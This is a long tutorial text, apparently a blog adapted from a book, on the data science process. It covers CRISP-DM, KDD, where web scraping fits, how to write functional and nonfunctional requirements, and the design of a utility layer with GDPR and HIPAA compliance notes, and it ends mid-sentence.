Data science and analytics continue to evolve at a rapid pace. The current hype surrounding AI and deep learning has given rise to yet again another collection of skills that organizations are looking for.
In any case, data science is about extracting value from data in a grounded manner where one realizes that data requires a lot of treatment and work from a lot of stakeholders before becoming valuable. This tutorial explains the Data Science Process with best examples.
As such, data science as an organizational activity is oftentimes described by means of a “process”: a workflow describing the steps that have to be undertaken in a data science project.
The construction of a predictive model to forecast who is going to churn, which customers will react positively to a marketing campaign, a customer segmentation task, or simply the automated creation of a periodical report listing some descriptive statistics.
As a data scientist (or someone aspiring to become one), you have probably already experienced that “data science” has become a very overloaded term indeed.
Companies are coming to terms with the fact that data science incorporates a very broad skill set that is near impossible to find in a single person, hence the need for a multidisciplinary team involving:
• Fundamental theorists, mathematicians, statisticians (think: regression, Bayesian modeling, linear algebra, Singular Value Decomposition, and so on).
• Data wranglers (think: people who know their way around SQL, Python’s panda's library and R’s dplyr).
• Analysts and modelers (think: building a random forest or neural network model using R or SAS).
• Database administrators (think: DB2 or MSSQL experts, people with a solid understanding of databases and SQL).
• Business intelligence experts (think: reporting and dashboards, as well as data warehouses and OLAP cubes).
• IT architects and “DevOps” people (think: people maintaining the modeling environment, tools, and platforms).
• Big data platform experts (think: people who know their way around Hadoop, Hive, and Spark).
• “Hacker” profiles (think: people comfortable on the command line, who know a bit of everything, can move fast, and break things).
• Business integrators, sponsors, and champions (think: people who know how to translate business questions to data requirements and modeling tasks, and can translate results back to stakeholders, and can emphasize the importance of data and data science in the organization).
• Management (think: higher-ups who put a focus on data on the agenda and have it trickle down throughout all layers of the organization).
• web scrapers
The raw source is data. Many such process frameworks have been proposed, with CRISP-DM and the KDD (Knowledge Discovery in Databases) process being the two most popular ones these days.
CRISP-DM stands for the “Cross-Industry Standard Process for Data Mining.” Polls conducted by KDnuggets (Machine Learning, Data Science, Big Data, Analytics, AI) over the past decade show that it is the leading methodology used by industry data miners and data scientists.
CRISP-DM is well-liked as it explicitly highlights the cyclic nature of data science: you’ll often have to go back to the beginning to hunt for new data sources in case the outcome of a project is not in line with what you expected or had hoped for.
The KDD process is a bit older than CRISP-DM and describes very similar steps (more as a straight-to path, though also here one has to keep in mind that going back a few steps can be necessary as well). It includes:
• ### Identify the business problem:
Similar to the “Business Understanding” step in CRISP-DM, the first step consists of a thorough definition of the business problem.
Some examples: customer segmentation of a mortgage portfolio, retention modeling for a postpaid telco subscription, or fraud detection for credit cards. Defining the scope of the analytical modeling exercise requires a close collaboration between the data scientist and business expert.
Both need to agree on a set of key concepts such as: How do we define a customer, transaction, churn, fraud, etc.; what is it we want to predict (how do we define this), and when are we happy with the outcome.
• ### Identify data sources:
Next, all source data that could be of potential interest need to be identified. This is a very important step as data is the key ingredient to any analytical exercise and the selection of data has a deterministic impact on the analytical models built in a later step.
• Select the data:
The general golden rule here is the more data, the better, though data sources that have nothing to do with the problem at hand should be discarded during this step. All appropriate data will then be gathered in a staging area and consolidated into a data warehouse, data mart, or even a simple spreadsheet file.
• Clean the data:
After the data has been gathered, along preprocessing and data wrangling series of steps follows to remove all inconsistencies, such as missing values, outliers, and duplicate data.
• Transform the data:
The preprocessing step will often also include a lengthy transformation part as well. Additional transformations may be considered, such as alphanumeric to numeric coding, geographical aggregation, logarithmic transformation to improve symmetry, and other smart “featurization” approaches.
• Analyze the data:
The steps above correspond with the “Data Understanding” and “Data Preparation” steps in CRISP-DM. Once the data is sufficiently cleaned and processed, the actual analysis and modeling can begin (referred to as “Modeling” in CRISP-DM).
Here, an analytical model is estimated on the preprocessed and transformed data. Depending on the business problem, a particular analytical technique will be selected and implemented by the data scientist.
• ### Interpret, evaluate, and deploy the model:
Finally, once the model has been built, it will be interpreted and evaluated by the business experts (denoted as “Evaluation” in CRISP-DM). Trivial patterns and insights that may be detected by the analytical model can still be interesting as they provide a validation of the model.
But, of course, the key challenge is to find the unknown, yet interesting and actionable patterns that can provide new insights into your data.
Once the analytical model has been appropriately validated and approved, it can be put into production as an analytics application (e.g., decision support system, scoring engine, etc.).
It is important to consider how to represent the model output in a user-friendly way, how to integrate it with other applications (e.g., marketing campaign management tools, risk engines, etc.), and how to ensure the analytical model can be appropriately monitored on an ongoing basis.
Often, the deployment of an analytical model will require the support of IT experts that will help to “productionize” the model.
### Where Does Web Scraping Fit In?
There are various parts of the data science process where web scraping can fit in. In most projects, however, web scraping will form an important part in the identification and selection of data sources. That is, to collect and gather data you can include in your data set to be used for modeling.
It is important to provide a warning here, which is to always keep the production setting of your constructed models in mind (the “model train” versus “model run” gap).
Are you building a model as a one-shot project that will be used to describe or find some interesting patterns, then, by all means, utilize as much scraped and external data as desired.
In case a model will be productionized as a predictive analytics application, however, keep in mind that the model will need to have access to the same variables at the time of deployment as when it was trained.
You’ll hence carefully need to consider whether it will be feasible to incorporate scraped data sources in such a setup, as it needs to be ensured that the same sources will remain available and that it will be possible to continue scraping them as you go forward.
Websites can change, and a data collection part depending on web scraping requires a great deal of maintenance to implement fixes or changes in a timely manner. In these cases, you still might wish to rely on a more robust solution like an API.
Depending on your project, this requirement might be more or less troublesome to deal with. If the data you’ve scraped refers to aggregated data that “remains valid” for the duration of a whole year.
For instance, then you can, of course, continue to use the collected data when running the models during deployment as well (and schedule a refresh of the data well before the year is over, for instance).
Always keep the production set of a model in mind: Will you have access to the data you need when applying and using the model as well, or only during the time of training the model?
Who will be responsible to ensure this data access? Is the model simply a proof of concept with a limited shelf life, or will it be used and maintained for several years going forward?
In some cases, the web scraping part will form the main component of a data science project. This is common in cases where some basic statistics and perhaps an appealing visualization is built over scraped results to present findings and explore the gathered data in a user-friendly way.
Still, the same questions have to be asked here: Is this a one-off report with a limited use time, or is this something people will want to keep up to date and use for a longer period of time?
The way how you answer these questions will have a great impact on the setup of your web scraper.
In case you only need to gather results using web scraping for a quick proof of concept, a descriptive model, or a one-off report, you can afford to sacrifice robustness for the sake of obtaining data quickly.
In case scraped data will be used during production as well (as was the case for the yearly aggregated information), it can still be feasible to scrape results, although it is a good idea to already think about the next time you’ll have to refresh the dataset and keep your setup as robust and well-documented as possible.
If information has to be scraped every time the model is run, the “scraping” part now effectively becomes part of the deployed setup, including all headaches that come along with it regarding monitoring, maintenance, and error handling. Make sure to agree on upfront which teams will be responsible for this!
There are two other “managerial warnings” we wish to provide here. One relates to data quality.
If you’ve been working with data in an organizational setting, you’ve no doubt heard about the GIGO principle: garbage in, garbage out. When you rely on the World Wide Web to collect data — with all the messiness and unstructuredness that goes with it — be prepared to take a “hit” regarding data quality.
Indeed, it is crucial to incorporate as much cleaning and fail-safes as possible in your scrapers, though you will nevertheless almost always eventually encounter a page where an extra unforeseen HTML tag appears or the text you expected is not there, or something is formatted just slightly differently. A final warning relates to reliability.
The same point holds, in fact, not just for web scraping but also for APIs. Many promising startups over the past years have appeared that utilize Twitter’s, Facebook’s or some other API to provide a great service.
What happens when the provider or owner of that website decides to increase their prices for what they’re offering to others? What happens if they retire their offering?
Many products have simply disappeared because their provider changed the rules. Using external data, in general, is oftentimes regarded as a silver bullet — “If only we could get out the information Facebook has!” — though think carefully and consider all possible outcomes before getting swayed too much by such ideas.
The business layer is the transition point between the nontechnical business requirements and desires and the practical data science, where, I suspect, most readers of this blog will have a tendency to want to spend their careers, doing the perceived more interesting data science.
The business layer does not belong to the data scientist 100%, and normally, its success represents a joint effort among such professionals as business subject matter experts, business analysts, hardware architects, and data scientists.
The business layer is where we record the interactions with the business. This is where we convert business requirements into data science requirements. The business layer must support the comprehensive collection of entire sets of requirements, to be used successfully by the data scientists.
If you want to process data and wrangle with your impressive data science skills, this blog may not be the start of a blog about practical data science that you would expect.
I suggest, however, that you read this blog if you want to work in a successful data science group. As a data scientist, you are not in control of all aspects of a business, but you have a responsibility to ensure that you identify the true requirements.
#### The Functional Requirements
Functional requirements record the detailed criteria that must be followed to realize the business’s aspirations from its real-world environment when interacting with the data science ecosystem. These requirements are the business’s view of the system, which can also be described as the “Will of the Business.”
Tip Record all the business’s aspirations. Make everyone supply their input. You do not want to miss anything, as later additions are expensive and painful for all involved.
I use the Moscow method as a prioritization technique, to indicate how important each requirement is to the business. I revisit all outstanding requirements before each development cycle, to ensure that I concentrate on the requirements that are of maximum impact to the business at present, as businesses evolve, and you must be aware of their true requirements.
#### Moscow Options
• Must have Requirements with the priority “must have” are critical to the current delivery cycle.
• Should have Requirements with the priority “should have” are important but not necessary to the current delivery cycle.
• Could have Requirements prioritized as “could have” are those that are desirable but not necessary, that is, nice to have to improve the user experience for the current delivery cycle.
• Won’t have Requirements with a “won’t have” priority are those identified by stakeholders as the least critical, lowest payback requests, or just not appropriate at that time in the delivery cycle.
General Functional Requirements
As a [user role] I want [goal] so that [business value] is achieved.
#### Specific Functional Requirements
The following requirements specific to data science environments will assist you in creating requirements that enable you to transform a business’s aspirations into technical descriptive requirements.
I have found these techniques highly productive in aligning requirements with my business customers, while I can easily convert or extend them for highly technical development requirements.
Data Mapping Matrix
The data mapping matrix is one of the core functional requirement recording techniques used in data science. It tracks every data item that is available in the data sources. I advise that you keep this useful matrix up to date as you progress through the processing layers.
Sun Models
The sun models is a requirement mapping technique that assists you in recording requirements at a level that allows your nontechnical users to understand the intent of your analysis while providing you with an easy transition to the detailed technical modeling of your data scientist and data engineer.
Note Over the next few pages, I will introduce several new concepts. Please read on, as the section will help in explaining the complete process.
### The Nonfunctional Requirements
Nonfunctional requirements record the precise criteria that must be used to appraise the operation of a data science ecosystem.
Accessibility Requirements
Accessibility can be viewed as the “ability to access” and benefit from some system or entity. The concept focuses on enabling access for people with disabilities, or special needs, or enabling access through assistive technology.
Assistive technology covers the following:
• Levels of blindness support: Must be able to increase font sizes or types to assist with reading for affected people
• Levels of color-blindness support: Must be able to change a color palette to match individual requirements
• Use of voice-activated commands to assist disabled people: Must be able to use voice commands for individuals that cannot type commands or use a mouse in a normal manner
### Audit and Control Requirements
The audit is the ability to investigate the use of the system and report any violations of the system’s data and processing rules. Control is making sure the system is used in the manner and by whom it is pre-approved to be used.
An approach called role-based access control (RBAC) is the most commonly used approach to restricting system access to authorized users of your system. RBAC is an access-control mechanism formulated around roles and privileges.
The components of RBAC are role-permissions—user-role and role-role relationships that together describe the system’s access policy.
These audit and control requirements are also compulsory, by regulations on privacy and processing. Please check with your local information officer which precise rules apply.
#### Availability Requirements
Availability is as a ratio of the expected uptime of a system to the aggregate of the downtime of the system. For example, if your business hours are between 9h00 and 17h00, and you cannot have more than 1 hour of downtime during your business hours, you require 87.5% availability.
Take note that you specify precisely at what point you expect the availability. If you are measuring at the edge of the data lake, it is highly possible that you will sustain 99.99999% availability with ease.
The distributed and fault-tolerant nature of the data lake technology would ensure a highly available data lake. But if you measure at critical points in the business, you will find that at these critical business points, the requirements are more specific for availability.
Record your requirements in the following format:
Component C will be entirely operational for P% of the time over an uninterrupted measured period of D days.
Your customers will understand this better than the general “24/7” or “business hours” terminology that I have seen used by some of my previous customers. No system can achieve these general requirement statements.
The business will also have periods of high availability at specific periods during the day, week, month, or year. An example would be every Monday morning the data science results for the weekly meeting has to be available. This could be recorded as the following:
Weekly reports must be entirely operational for 100% of the time between 06h00 and 10h00 every Monday for each office.
Note Think what this means to a customer that has worldwide offices over several time zones. Be sure to understand every requirement fully!
The correct requirements are
• London’s weekly reports must be entirely operational for 100% of the time between 06h00 and 10h00 (Greenwich Mean Time or British Daylight Time) every Monday.
• New York’s weekly reports must be entirely operational for 100% of the time between 06h00 and 10h00 (Eastern Standard Time or Eastern Daylight Time) every Monday.
Note You can clearly see that these requirements are now more precise than the simple general requirement.
Identify single points of failure (SPOFs) in the data science solution. Ensure that you record this clearly, as SPOFs can impact many of your availability requirements indirectly.
Highlight that those dependencies between components that may not be available at the same time must be recorded and requirements specified, to reflect this availability requirement fully.
Note Be aware that the different availability requirements for different components in the same solution are the optimum requirement recording option.
#### Backup Requirements
A backup, or the process of backing up, refers to the archiving of the data lake and all the data science programming code, programming libraries, algorithms, and data models, with the sole purpose of restoring these to a known good state of the system, after a data loss or corruption event.
Remember: Even with the best distribution and self-healing capability of the data lake, you have to ensure that you have a regular and appropriate backup to restore. Remember a backup is only valid if you can restore it.
The merit of any system is its ability to return to a good state. This is a critical requirement.
For example, suppose that your data scientist modifies the system with a new algorithm that erroneously updates an unknown amount of the data in the data lake. Oh, yes, that silent moment before every alarm in your business goes mad! You want to be able at all times to return to a known good state via a backup.
Warning Please ensure that you can restore your backups in an effective and efficient manner. The process is backup-and-restore. Just generating backups does not ensure survival. Understand the impact it has on the business if it goes back two hours or what happens while you restore.
### Capacity, Current, and Forecast
Capacity is the ability to load, process, and store a specific quantity of data by the data science processing solution.
You must track the current and forecast the future requirements because as a data scientist, you will design and deploy many complex models that will require additional capacity to complete the processing pipelines you create during your processing cycles.
Warning I have inadvertently created models that generate several terabytes of workspace requirements, simply by setting the parameters marginally too in-depth than optimal. Suddenly, my model was demanding disk space at an alarming rate!
Capacity
Capacity is measured per the component’s ability to consistently maintain specific levels of performance as data load demands vary in the solution. The correct way to record the requirement is Component C will provide P% capacity for U users, each with M MB of data during a time frame of T seconds.
Example:
The data hard drive will provide 95% capacity for 1000 users, each with 10MB of data during a time frame of 10 minutes.
Warning Investigate the capacity required to perform a full rebuild in one process. I advise researching new cloud on-demand capacity, for disaster recovery or capacity top-ups. I have been consulted after major incidents that crippled a company for weeks, owing to a lack of proper capacity top-up plans.
### Concurrency
Concurrency is the measure of a component to maintain a specific level of performance when under multiple simultaneous loads conditions.
The correct way to record the requirement is Component C will support a concurrent group of U users running predefined acceptance script S simultaneously.
Example:
The memory will support a concurrent group of 100 users running a sort algorithm of 1000 records simultaneously.
Note Concurrency is the ability to handle a subset of the total user base effectively. I have found that numerous solutions can handle substantial volumes of users with as little as 10% of the users’ running concurrently.
Concurrency is an important requirement to ensure an effective solution at the start. Capacity can be increased by adding extra processing resources, while concurrency normally involves complete replacements of components.
Design Tip If on average you have short-running data science algorithms, you can support high concurrency to maximum capacity ratio. But if your average running time is higher, your concurrency must be higher too. This way, you will maintain an effective throughput performance.
#### Throughput Capacity
This is how many transactions at peak time the system requires to handle specific conditions.
Storage (Memory)
This is the volume of data the system will persist in memory at runtime to sustain an effective processing solution.
Tip Remember: You can never have too much or too slow memory.
Storage (Disk)
This is the volume of data the system stores on disk to sustain an effective processing solution.
Tip Make sure that you have a proper mix of disks, to ensure that your solutions are effective.
You will need short-term storage on fast solid-state drives to handle the while-processing capacity requirements.
Warning There are data science algorithms that produce larger data volumes during data processing than the input or output data.
The next requirement is your long-term storage. The basic rule is to plan for bigger but slower storage.
Investigate using clustered storage, whereby two or more storage servers work together to increase performance, capacity, and reliability. Clustering distributes workloads to each server and manages the transfer of workloads between servers while ensuring availability.
The use of clustered storage will benefit you in the long term, during periods of higher demand, to scale out vertically with extra equipment.
Tip Ensure that the server network is more than capable of handling any data science load. Remember: The typical data science algorithm requires massive data sets to work effectively.
The big data revolution is now bringing massive amounts of data into the processing ecosystem. So, make sure you have enough space to store any data you need.
Warning If you have a choice, do not share disk storage or networks with a transactional system. The data science will consume any spare capacity on the shared resources. It is better to have a lower performance dedicated set of resources than to share a volatile process.
#### Storage (GPU)
This is the volume of data the system will persist in GPU memory at runtime to sustain an effective parallel processing solution, using the graphical processing capacity of the solution.
A CPU consists of a limited amount of cores that are optimized for sequential serial processing, while a GPU has a massively parallel architecture consisting of thousands of smaller, more efficient cores intended for handling massive amounts of multiple tasks simultaneously.
The big advantage is to connect an effective quantity of very high-speed memory as closely as possible to these thousands of processing units, to use this increased capacity. I am currently deploying systems such as Kinetic DB and MapD, which are GPU-based database engines.
This improves the processing of my solutions by factors of a hundred in speed. I suspect that we will see key enhancements in the capacity of these systems over the next years.
Tip Investigate a GPU processing grid for your high-performance processing. It is an effective solution with the latest technology.
#### Year-on-Year Growth Requirements
The biggest growth in capacity will be for long-term storage. These requirements are specified as how much capacity increases over a period.
The correct way to record the requirement is Component C will be responsible for the necessary growth capacity to handle additional M MB of data within a period of T.
Configuration Management
Configuration management (CM) is a systems engineering process for establishing and maintaining consistency of a product’s performance, functional, and physical attributes against requirements, design, and operational information throughout its life.
Deployment
A methodical procedure of introducing data science to all areas of an organization is required. Investigate how to achieve a practical continuous deployment of the data science models. These skills are much in demand, as the processes model changes more frequently as the business adopts new processing techniques.
Documentation
Data science requires a set of documentation to support the story behind the algorithms. I will explain the documentation required at each stage of the processing pipe.
Disaster Recovery
Disaster recovery (DR) involves a set of policies and procedures to enable the recovery or continuation of vital technology infrastructure and systems following a natural or human-induced disaster.
### Efficiency (Resource Consumption for Given Load)
Efficiency is the ability to accomplish a job with a minimum expenditure of time and effort. As a data scientist, you are required to understand the efficiency curve of each of your modeling techniques and algorithms. As I suggested before, you must practice with your tools at different scales.
Tip If it works at a sample 100,000 data points, try 200,000 data points or 500,000 data points. Make sure you understand the scaling dynamics of your tools.
### Effectiveness (Resulting Performance in Relation to Effort)
Effectiveness is the ability to accomplish a purpose; producing the precise intended or expected result from the ecosystem.
As a data scientist, you are required to understand the efficiency curve of each of your modeling techniques and algorithms. You must ensure that the process is performing only the desired processing and has no negative side effects.
Extensibility
The ability to add extra features and carry forward customizations at next-version upgrades within the data science ecosystem. The data science must always be capable of being extended to support new requirements.
### Failure Management
Failure management is the ability to identify the root cause of a failure and then successfully record all the relevant details for future analysis and reporting.
I have found that most of the tools I would include in my ecosystem have adequate fault management and reporting capability already built into their native internal processing.
Tip I found it takes a simple but well-structured set of data science processes to wrap the individual failure logs into a proper failure-management system. Apply normal data science to it, as if it is just one more data source.
I always stipulate the precise expected process steps required when a failure of any component of the ecosystem is experienced during data science processing.
Acceptance script S completes and reports every one of the X faults it generates. As a data scientist, you are required to log any failures of the system, to ensure that no unwanted side effects are generated that may cause a detrimental impact to your customers.
### Fault Tolerance
Fault tolerance is the ability of the data science ecosystem to handle faults in the system’s processing. In simple terms, no single event must be able to stop the ecosystem from continuing the data science processing.
Here, I normally stipulate the precise operating system monitoring, measuring, and management requirements within the ecosystem, when faults are recorded.
Acceptance script S withstands the X faults it generates. As a data scientist, you are required to ensure that your data science algorithms can handle faults and recover from them in an orderly manner.
### Latency
Latency is the time it takes to get the data from one part of the system to another. This is highly relevant in the distributed environment of the data science ecosystems.
Acceptance script S completes within T seconds on an unloaded system and within T2 seconds on a system running at maximum capacity, as defined in the concurrency requirement.
Tip Remember: There is also an internal latency between components that make up the ecosystem that is not directly accessible to users. Make sure you also note these in your requirements.
### Interoperability
Insist on a precise ability to share data between different computer systems under this section.
Explain in detail what system must interact with what other systems. I normally investigate areas such as communication protocols, locations of servers, operating systems for different subcomponents, and the now-important end user’s Internet access criteria.
Warning Be precise with requirements, as open-ended interoperability can cause unexpected complications later in the development cycle.
Maintainability
Insist on a precise period during which a specific component is kept in a specified state. Describe precisely how changes to functionalities, repairs, and enhancements are applied while keeping the ecosystem in a known good state.
### Modifiability
Stipulate the exact amount of change the ecosystem must support for each layer of the solution.
Tip State what the limits are for specific layers of the solution. If the database can only support 2024 fields to a table, share that information!
### Network Topology
Stipulate and describe the detailed network communication requirements within the ecosystem for processing. Also, state the expected communication to the outside world, to drive successful data science.
Note Owing to the high impact on network traffic from several distributed data science algorithms processing, it is required that you understand and record the network necessary for the ecosystem to operate at an acceptable level.
Privacy
I suggest listing the exact privacy laws and regulations that apply to this ecosystem. Make sure you record the specific laws and regulations that apply. Seek legal advice if you are unsure.
This is a hot topic worldwide, as you will process and store other people’s data and execute algorithms against this data. As a data scientist, you are responsible for your actions.
Warning Remember: A privacy violation will result in a fine!
Tip I hold liability insurance against legal responsibility claims for the data I process.
Quality
Specify the rigorous faults discovered, faults delivered, and fault removal efficiency at all levels of the ecosystem. Remember: Data quality is a functional requirement. This is a nonfunctional requirement that states the quality of the ecosystem, not the data flowing through it.
### Recovery/Recoverability
The ecosystem must have a clear-cut mean time to recovery (MTTR) specified. The MTTR for specific layers and components in the ecosystem must be separately specified. I typically measure in hours, but for other extra-complex systems, I measure in minutes or even seconds.
Reliability
The ecosystem must have a precise mean time between failures (MTBF). This measurement of availability is specified in a pre-agreed unit of time. I normally measure in hours, but there are extra sensitive systems that are best measured in years.
Resilience
Resilience is the capability to deliver and preserve a tolerable level of service when faults and issues to normal operations generate complications for the processing. The ecosystem must have a defined ability to return to the original form and position in time, regardless of the issues it has to deal with during processing.
#### Resource Constraints
Resource constraints are the physical requirements of all the components of the ecosystem. The areas of interest are processor speed, memory, disk space, and network bandwidth, plus, normally, several other factors specified by the tools that you deploy into the ecosystem.
Tip Discuss these requirements with your system’s engineers. This is not normally the area in which data scientists work.
Reusability
Reusability is the use of pre-built processing solutions in the data science ecosystem development process. The reuse of preapproved processing modules and algorithms is highly advised in the general processing of data for the data scientists. The requirement here is that you use approved and accepted standards to validate your own results.
Warning I always advise that you use methodologies and algorithms that have proven lineage. An approved algorithm will guarantee acceptance by the business. Do not use unproven ideas!
### Scalability
Scalability is how you get the data science ecosystem to adapt to your requirements. I use three scalability models in my ecosystem: horizontal, vertical, and dynamic (on-demand).
Horizontal scalability increases capacity in the data science ecosystem through more separate resources, to improve performance and provide high availability (HA). The ecosystem grows by a scale-out, by adding more servers to the data science cluster of resources.
Tip Horizontal scalability is the proven way to handle full-scale data science ecosystems.
Warning Not all models and algorithms can scale horizontally. Test them first.
#### I would counsel against making assumptions.
Vertical scalability increases capacity by adding more resources (more memory or an additional CPU) to an individual machine.
Warning Make sure that you size your data science building blocks correctly at the start, as vertical scaling of clusters can get expensive and complex to swap at later stages.
Dynamic (on-demand) scalability increases capacity by adding more resources, using either public or private cloud capability, which can be increased and decreased on a pay-as-you-go model.
This is a hybrid model using a core set of resources that is the minimum footprint of the system, with additional burst agreements to cover any planned or even unplanned extra scalability increases in capacity that the system requires.
I’d like to discuss scalability for your power users. Traditionally, I would have suggested high-specification workstations, but I have found that you will serve them better by providing them access to a flexible horizontal scalability on-demand environment.
This way, they use what they need during peak periods of processing but share the capacity with others when they do not require the extra processing power.
Security
One of the most important nonfunctional requirements is security. I specify security requirements at three levels.
Privacy
I would specifically note requirements that specify protection for sensitive information within the ecosystem. Types of privacy requirements to note include data encryption for database tables and policies for the transmission of data to third parties.
Tip Sources for privacy requirements are legislative or corporate. Please consult your legal experts.
### Physical
I would specifically note requirements for the physical protection of the system. Include physical requirements such as power, elevated floors, extra server cooling, fire prevention systems, and cabinet locks.
Warning Some of the high-performance workstations required to process data science have stringent power requirements, so ensure that your data scientists are in a preapproved environment, to avoid overloading the power grid.
Access
I purposely specify detailed access requirements with defined account types/groups and their precise access rights.
A tip I use role-based access control (RBAC) to regulate access to data science resources, based on the roles of individual users within the ecosystem and not by their separate names. This way, I simply move the role to a new person, without any changes to the security profile.
Testability
International standard IEEE 1233-1998 states that testability is the “degree to which a requirement is stated in terms that permit the establishment of test criteria and performance of tests to determine whether those criteria have been met.” In simple terms, if your requirements are not testable, do not accept them.
Remember A lower degree of testability results in increased test effort. I have spent too many nights creating tests for requirements that are unclear.
Following is a series of suggestions, based on my experience.
### Controllability
Knowing the precise degree to which I can control the state of the code under test, as required for testing, is essential.
The algorithms used by data science are not always controllable, as they include random start points to speed the process. Running distributed algorithms is not easy to deal with, as the distribution of the workload is not under your control.
Isolate Ability
The specific degree to which I can isolate the code under test will drive most of the possible testing. A process such as deep learning includes non-isolation, so do not accept requirements that you cannot test, owing to not being able to isolate them.
Understandability
I have found that most algorithms have undocumented “extra features” or, in simple terms, “got-you” states. The degree to which the algorithms under test are documented directly impacts the testability of requirements.
### Automatability
I have found the degree to which I can automate testing of the code directly impacts the effective and efficient testing of the algorithms in the ecosystem. I am an enthusiast of known result inline testing.
I add code to my algorithms that test specific sub-sessions, to ensure that the new code has not altered the previously verified code.
#### Common Pitfalls with Requirements
I just want to list a sample of common pitfalls I have noted while performing data science for my customer base. If you are already aware of these pitfalls, well done!
Many seem obvious; however, I regularly work on projects in which these pitfalls have cost my clients millions of dollars before I was hired. So, let’s look at some of the more common pitfalls I encounter regularly.
Weak Words
Weak words are subjective or lack a common or precise definition. The following are examples in which weak words are included and identified:
• Users must easily access the system.
What is “easily”?
• Use reliable technology.
What is “reliable”?
• State-of-the-art equipment
What is “state-of-the-art”?
• Reports must run frequently.
What is “frequently”?
• User-friendly report layouts
What is “user-friendly”?
What is “secure?
• All data must be immediately reported.
What is “all”? What is “immediately”?
I could add many more examples. But you get the common theme. Make sure the wording of your requirements is precise and specific. I have lamentably come to understand that various projects end in disaster, owing to weak words.
#### Unbounded Lists
An unbounded list is an incomplete list of items. Examples include the following:
Accessible at least from London and New York.
Do I connect only London to New York? What about the other 20 branches?
Including, but not limited to, London and New York offices must have access.
So, is the New Delhi office not part of the solution?
Make sure your lists are complete and precise. This prevents later issues caused by requirements being misunderstood.
Implicit Collections
When collections of objects within requirements are not explicitly defined, you or your team will assume an incorrect meaning. See the following example:
The solution must support TCP/IP and other network protocols supported by existing users with Linux.
• What is meant by “existing user”?
• What belongs to the collection of “other network protocols”?
• What are the specific protocols of TCP/IP included?
• “Linux” is a collection of operating systems from a number of vendors, with many versions and even revisions. Do you support all the different versions or only one of them?
Make sure your collections are explicit and precise. This prevents later issues from requirements being misunderstood.
Ambiguity
Ambiguity occurs when a word within the requirement has multiple meanings.
Examples are listed following.
Vagueness
The system must pass between 96–100% of the test cases using current standards for data science.
What are the “current standards”? This is an example of an unclear requirement!
Subjectivity
The report must easily and seamlessly integrate with the websites.
“Easily” and “seamlessly” are highly subjective terms where testing is concerned.
Optionality:
The solution should be tested under as many hardware conditions as possible.
“As possible” makes this requirement optional. What if it fails testing on every hardware setup? Is that okay with your customer?
Under-specification
The solution must support Hive 2.1 and other database versions.
Do other database versions only include other Hive databases, or also others such as HBase version 1.0 and Oracle version 10i?
### Under-reference
Users must be able to complete all previously defined reports in less than three minutes 90% of the day.
What are these “previously defined” reports? This is an example of an unclear requirement.
#### Engineering a Practical Business Layer
Any source code or other supplementary material referenced by me in this blog is available to readers on GitHub, via this blog’s product page, located at www.apress. com/9781484230534.
The business layer follows general business analysis and project management principals. I suggest a practical business layer consist of a minimum of three primary structures.
For the business layer, I suggest using a directory structure, such as ./VKHCG/05- DS/5000-BL. This enables you to keep your solutions clean and tidy for a successful interaction with a standard version-control system.
Requirements
Every requirement must be recorded with full version control, in a requirement-per-file manner. I suggest a numbering scheme of 000000-00, which supports up to a million requirements with up to a hundred versions of each requirement.
### Requirements Registry
Keep a summary registry of all requirements in one single file, to assist with searching for specific requirements. I suggest you have a column with the requisite number, Moscow, a short description, date created, date last version, and status. I normally use the following status values:
• In-Development
• In-Production
• Retired
The register acts as a control for the data science environment’s requirements.
Traceability Matrix
Create a traceability matrix against each requirement and the data science process you developed, to ensure that you know what data science process supports which requirement. This ensures that you have complete control of the environment. Changes are easy if you know how everything interconnects.
Utility Layer
The utility layer is used to store repeatable practical methods of data science. The objective of this blog is to define how the utility layer is used in the ecosystem.
Utilities are the common and verified workhorses of the data science ecosystem. The utility layer is a central storehouse for keeping all one’s solutions utilities in one place.
Having a central store for all utilities ensures that you do not use out-of-date or duplicate algorithms in your solutions. The most important benefit is that you can use stable algorithms across your solutions.
Tip Collect all your utilities (including source code) in one central place. Keep records on all versions for future reference.
If you use algorithms, I suggest that you keep any proof and credentials that show that the process is a high-quality, industry-accepted algorithm. Hard experience has taught me that you are likely to be tested, making it essential to prove that your science is 100% valid.
The additional value is the capability of larger teams to work on a similar project and know that each data scientist or engineer is working to the identical standards. In several industries, it is a regulated requirement to use only sanctioned algorithms.
On May 25, 2018, a new European Union General Data Protection Regulation (GDPR) goes into effect. The GDPR has the following rules:
You must have valid consent as a legal basis for processing. For any utilities you use, it is crucial to test for consent.
You must assure transparency, with clear information about what data is collected and how it is processed. Utilities must generate complete audit trails of all their activities.
You must support the right to accurate personal data.
Utilities must use only the latest accurate data. You must support the right to have personal data erased. Utilities must support the removal of all information on a specific person. I will also discuss what happens if the “right to be forgotten” is requested.
Warning The “right to be forgotten” is a request that demands that you remove a person(s) from all systems immediately. Noncompliance with such a request will result in a fine.
This sounds easy at first, but take warning from my experiences and ensure that this request is implemented with care.
You must have the approval to move data between service providers.
I advise you to make sure you have 100% approval to move data between data providers. If you move the data from your customer’s systems to your own systems without clear approval, both you and your customer may be in trouble with the law. You must support the right not to be subject to a decision based solely on automated processing.
This item is the subject of debate in many meetings that I attend. By the nature of what we as data scientists perform, we are conducting, more or less, a form of profiling. The actions of our utilities support decisions from our customers. The use of approved algorithms in our utilities makes compliance easier.
Warning Noncompliance with GDPR might incur fines of 4% of global turnover. Demonstrate compliance by maintaining a record of all data processing activities.
In France, you must use only approved health processing rules from the National Health Data Institute. Processing of any personal health data is prohibited without the provision of an individual’s explicit consent.
In the United States, the Health Insurance Portability and Accountability Act of 1996 (HIPAA) guides any processing of health data.
Warning Noncompliance with HIPAA could incur fines of up to $50,000 per violation. I suggest you investigate the rules and conditions for processing any data you handle. In addition, I advise you to get your utilities certified, to show compliance. Discuss with your chief data officer what procedures are used and which prohibited procedures require checking. ### Basic Utility Design The basic utility must have a common layout to enable future reuse and enhancements. This standard makes the utilities more flexible and effective to deploy in a large-scale ecosystem. I use a basic design for a processing utility, by building it a three-stage process. • \ 1.\ Load data as per input agreement. • \ 2.\ Apply processing rules of utility. • \ 3.\ Save data as per output agreement. The main advantage of this methodology in the data science ecosystem is that you can build a rich set of utilities that all your data science algorithms require. That way, you have a basic pre-validated set of tools to use to perform the common processing and then spend time only on the custom portions of the project. You can also enhance the processing capability of your entire project collection with one single new utility update. Note I spend more than 80% of my non-project work time designing new utilities and algorithms to improve my delivery capability. I suggest that you start your utility layer with a small utility set that you know works well and build the set out as you go along. In this blog, I will guide you through utilities I have found to be useful over my years of performing data science. I have split the utilities across various layers of the ecosystem, to assist you in connecting the specific utility to specific parts of the other blogs. #### There are three 